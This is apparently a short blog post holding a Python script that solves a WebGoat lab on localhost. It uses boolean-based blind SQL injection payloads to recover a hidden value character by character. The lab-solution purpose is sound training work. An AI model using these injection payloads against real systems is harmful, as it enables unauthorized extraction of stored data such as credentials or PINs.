Blind string injection

JAEJUNG 2021. 9. 2. 16:30
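import requests

# WebGoat lesson endpoint on a local training instance
url = 'http://localhost:8080/WebGoat/attack?Screen=1315528047&menu=1100'
cookie = {'JSESSIONID': '2C39E081510CA8F799595014F02D79A7'}  # changes with every session

# Step 1: find the length of the name by raising the threshold
# until the injected condition stops being true.
words = "101 and length(select name from pins where cc_number='4321432143214321') >"

limit = 0  # stays 0 if no length below 10 is found
for i in range(0, 10):
    data = {'account_number': words + str(i), 'SUBMIT': 'GO!'}
    res = requests.post(url, data=data, cookies=cookie)
    if 'Account number is valid' in res.text:
        continue  # length > i, keep going
    if 'Invalid' in res.text:
        limit = i  # length > i is false, so the length is i
        break

# Step 2: recover the name one character at a time. For each position,
# the first ASCII value j for which "char > chr(j)" is false is the character.
text = ''
for i in range(0, limit):
    for j in range(65, 123):
        find_word = "101 and substr((select name from pins where cc_number='4321432143214321')," + str(i + 1) + ", 1) >"
        data = {'account_number': find_word + "'" + chr(j) + "'", 'SUBMIT': 'GO!'}
        res = requests.post(url, data=data, cookies=cookie)
        if 'Account number is valid' in res.text:
            continue
        if 'Invalid' in res.text:
            text += chr(j)
            break

print(text)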
